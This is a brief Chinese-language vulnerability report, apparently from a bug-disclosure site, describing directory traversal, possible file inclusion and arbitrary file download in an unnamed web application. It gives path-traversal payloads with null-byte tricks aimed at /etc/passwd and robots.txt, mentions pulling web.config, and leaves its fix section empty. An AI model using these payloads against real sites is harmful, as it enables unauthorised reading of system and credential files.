总之敏感信息太多了,收集些信息干XXOO的事情还算比较容易。涛涛电脑知识网
详细说明:
这里目录遍历 etc/passwd
还可以包含?
任意文件下载 比如web.config
漏洞证明:
目录遍历 etc/passwd
?a=login&m=../../../../../../../../../../etc/passwd%00
这里是包含?好像做了限制!不确定。
?a=login&m=../../robots.txt%00.php
下载文件
修复方案:
.....